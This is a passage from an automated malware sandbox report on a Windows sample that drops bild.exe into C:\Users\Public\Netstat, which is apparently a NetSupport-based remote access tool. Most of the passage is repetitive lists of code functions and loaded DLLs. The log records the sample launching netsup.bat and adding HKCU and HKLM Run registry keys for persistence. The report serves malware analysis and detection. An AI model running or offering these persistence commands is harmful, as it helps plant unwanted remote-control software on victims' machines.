                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1115E9805_2_1115E980
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1101C9C05_2_1101C9C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110088AB5_2_110088AB
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11050D805_2_11050D80
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5DA9805_2_6C5DA980
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C603DB85_2_6C603DB8
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C6039235_2_6C603923
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C6049105_2_6C604910
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5DDBA05_2_6C5DDBA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5E84F05_2_6C5E84F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C6045285_2_6C604528
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5D17605_2_6C5D1760
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C60A0635_2_6C60A063
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C6041565_2_6C604156
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5D13105_2_6C5D1310
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11061C906_2_11061C90
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110330106_2_11033010
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110733B06_2_110733B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111632206_2_11163220
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110295906_2_11029590
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111674856_2_11167485
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110454F06_2_110454F0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1101B7606_2_1101B760
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111258B06_2_111258B0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1101BBA06_2_1101BBA0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11087C606_2_11087C60
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110700906_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110804806_2_11080480
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1115E9806_2_1115E980
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1101C9C06_2_1101C9C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110088AB6_2_110088AB
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11050D806_2_11050D80
                                Source: C:\Users\Public\Netstat\bild.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: String function: 00D8CEC0 appears 52 times
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: String function: 00D8D870 appears 31 times
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: String function: 00D8CDF0 appears 37 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 110B7A20 appears 43 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11146450 appears 1191 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1109D8C0 appears 32 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5E7C70 appears 36 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11146EC0 appears 48 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 110278E0 appears 94 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5F9480 appears 57 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1116F010 appears 74 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11029450 appears 1989 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5E7A90 appears 58 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5FF3CB appears 33 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 111603E3 appears 82 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11173663 appears 40 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1105DD10 appears 581 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5D30A0 appears 54 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5E7D00 appears 127 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11081BB0 appears 81 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 1105DE40 appears 54 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 6C5D6F50 appears 168 times
                                Source: C:\Users\Public\Netstat\bild.exeCode function: String function: 11164010 appears 64 times
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000548C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll2 vs d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll2 vs d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                Source: classification engineClassification label: mal96.rans.evad.winEXE@14/12@1/2
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11059C50 GetLastError,FormatMessageA,LocalFree,5_2_11059C50
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,5_2_1109D440
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,5_2_1109D4D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,6_2_1109D440
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,6_2_1109D4D0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,5_2_11115B70
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D88BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00D88BD0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,5_2_11127E10
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile created: C:\Users\Public\NetstatJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCommand line argument: sfxname0_2_00D8C131
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCommand line argument: sfxstime0_2_00D8C131
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCommand line argument: STARTDLG0_2_00D8C131
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeReversingLabs: Detection: 57%
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeFile read: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe "C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe"
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exe
                                Source: unknownProcess created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
                                Source: unknownProcess created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
                                Source: unknownProcess created: C:\Users\Public\Netstat\bild.exe "C:\Users\Public\Netstat\bild.exe"
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exeJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeSection loaded: msasn1.dllJump to behavior
